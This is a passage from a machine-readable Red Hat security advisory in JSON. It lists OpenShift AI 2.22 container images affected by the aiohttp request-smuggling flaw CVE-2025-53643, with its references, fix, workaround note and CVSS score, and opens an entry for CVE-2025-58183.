"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-53643"
},
{
"category": "external",
"summary": "RHBZ#2380000",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380000"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-53643",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53643"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-53643",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53643"
},
{
"category": "external",
"summary": "https://github.com/aio-libs/aiohttp/commit/e8d774f635dc6d1cd3174d0e38891da5de0e2b6a",
"url": "https://github.com/aio-libs/aiohttp/commit/e8d774f635dc6d1cd3174d0e38891da5de0e2b6a"
},
{
"category": "external",
"summary": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-9548-qrrj-x5pj",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-9548-qrrj-x5pj"
}
],
"release_date": "2025-07-14T20:17:18.247000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.7,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "aiohttp: AIOHTTP HTTP Request/Response Smuggling"
},
{
"cve": "CVE-2025-58183",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2025-10-29T23:01:50.573951+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
